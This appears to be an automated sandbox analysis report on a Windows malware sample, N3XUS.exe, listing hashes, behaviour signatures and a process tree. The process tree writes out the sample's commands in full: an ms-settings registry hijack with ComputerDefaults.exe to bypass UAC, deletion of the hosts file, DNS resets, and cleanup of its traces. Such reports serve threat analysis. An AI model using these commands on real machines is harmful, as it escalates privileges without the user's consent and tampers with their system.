Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/11/2024, 09:56

General

  • Target

    N3XUS.exe

  • Size

    255KB

  • MD5

    a5c463cb69a24c37d962587706f4df4b

  • SHA1

    634520f698c5ce7df3e51174fe64306b1b0f1bfe

  • SHA256

    dcf5453a2be04f3ebe45d56e631a9cadb573b27de1ef142ecd958ba8560f0dd0

  • SHA512

    92f61d162802401ae7473e235becd580419a57e1cfe99475166717d93de26e51ecbd60bbebbe0b9a6a8fe15bb1c42c9f31676cef37815f040a0c408108c04c2e

  • SSDEEP

    3072:Sz2z1EWSnEvrSmD+l25mFdO4em5guIg+GtfDVVtTzKE:Sz2zBvrSmD/d4z5UlqDVvzKE

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Modifies registry class 33 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\N3XUS.exe
    "C:\Users\Admin\AppData\Local\Temp\N3XUS.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2008
    • C:\Windows\system32\cmd.exe
      /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4652
      • C:\Windows\system32\reg.exe
        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        3⤵
          PID:1564
      • C:\Windows\system32\cmd.exe
        /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9371.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\9371.vbs" /f
          3⤵
          • Modifies registry class
          PID:4092
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          3⤵
          • Modifies registry class
          PID:1844
      • C:\Windows\system32\cmd.exe
        /c start /B ComputerDefaults.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3796
        • C:\Windows\system32\ComputerDefaults.exe
          ComputerDefaults.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\system32\wscript.exe
            "wscript.exe" C:\Users\Admin\AppData\Local\Temp\9371.vbs
            4⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1360
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
              5⤵
                PID:3416
        • C:\Windows\system32\cmd.exe
          /c del /f C:\Users\Admin\AppData\Local\Temp\9371.vbs
          2⤵
            PID:3176
          • C:\Windows\system32\cmd.exe
            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2012
            • C:\Windows\system32\reg.exe
              reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              3⤵
              • Modifies registry class
              PID:4484
          • C:\Windows\system32\cmd.exe
            /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3784
            • C:\Windows\system32\reg.exe
              reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              3⤵
                PID:2816
            • C:\Windows\system32\cmd.exe
              /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8100.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4048
              • C:\Windows\system32\reg.exe
                reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\8100.vbs" /f
                3⤵
                • Modifies registry class
                PID:4776
              • C:\Windows\system32\reg.exe
                reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                3⤵
                • Modifies registry class
                PID:1020
            • C:\Windows\system32\cmd.exe
              /c start /B ComputerDefaults.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:736
              • C:\Windows\system32\ComputerDefaults.exe
                ComputerDefaults.exe
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:100
                • C:\Windows\system32\wscript.exe
                  "wscript.exe" C:\Users\Admin\AppData\Local\Temp\8100.vbs
                  4⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:1060
                  • C:\Windows\System32\netsh.exe
                    "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
                    5⤵
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:2028
            • C:\Windows\system32\cmd.exe
              /c del /f C:\Users\Admin\AppData\Local\Temp\8100.vbs
              2⤵
                PID:3076
              • C:\Windows\system32\cmd.exe
                /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1796
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  3⤵
                  • Modifies registry class
                  PID:1100
              • C:\Windows\system32\cmd.exe
                /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4084
                • C:\Windows\system32\reg.exe
                  reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  3⤵
                    PID:3888
                • C:\Windows\system32\cmd.exe
                  /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2961.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2356
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\2961.vbs" /f
                    3⤵
                    • Modifies registry class
                    PID:1576
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                    3⤵
                    • Modifies registry class
                    PID:4404
                • C:\Windows\system32\cmd.exe
                  /c start /B ComputerDefaults.exe
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4384
                  • C:\Windows\system32\ComputerDefaults.exe
                    ComputerDefaults.exe
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1736
                    • C:\Windows\system32\wscript.exe
                      "wscript.exe" C:\Users\Admin\AppData\Local\Temp\2961.vbs
                      4⤵
                      • Checks computer location settings
                      PID:4016
                      • C:\Windows\System32\netsh.exe
                        "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
                        5⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        PID:404
                • C:\Windows\system32\cmd.exe
                  /c del /f C:\Users\Admin\AppData\Local\Temp\2961.vbs
                  2⤵
                    PID:4908
                  • C:\Windows\system32\cmd.exe
                    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                    2⤵
                      PID:3628
                      • C:\Windows\system32\reg.exe
                        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                        3⤵
                        • Modifies registry class
                        PID:3656

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\2961.vbs

                    Filesize

                    117B

                    MD5

                    bb8cfb89bce8af7384447115a115fb23

                    SHA1

                    6a0e728f4953128db9db52474ae5608ecee9c9c3

                    SHA256

                    d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485

                    SHA512

                    d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553

                  • C:\Users\Admin\AppData\Local\Temp\8100.vbs

                    Filesize

                    114B

                    MD5

                    34b33b5a437e20d03d79b62a797dfe99

                    SHA1

                    9b57b598a7e9d66157a05a44bc7c097bf5486e6c

                    SHA256

                    f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1

                    SHA512

                    757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c

                  • C:\Users\Admin\AppData\Local\Temp\9371.vbs

                    Filesize

                    125B

                    MD5

                    8b4ed5c47fdddbeba260ef11cfca88c6

                    SHA1

                    868f11f8ed78ebe871f9da182d053f349834b017

                    SHA256

                    170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

                    SHA512

                    87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

                  • memory/2008-0-0x000001FBCB700000-0x000001FBCB701000-memory.dmp

                    Filesize

                    4KB

                  • memory/2008-1-0x000001FBCB710000-0x000001FBCB711000-memory.dmp

                    Filesize

                    4KB

                  • memory/2008-2-0x000001FBCCF70000-0x000001FBCCF71000-memory.dmp

                    Filesize

                    4KB

                  • memory/2008-4-0x000001FBCCF90000-0x000001FBCCF91000-memory.dmp

                    Filesize

                    4KB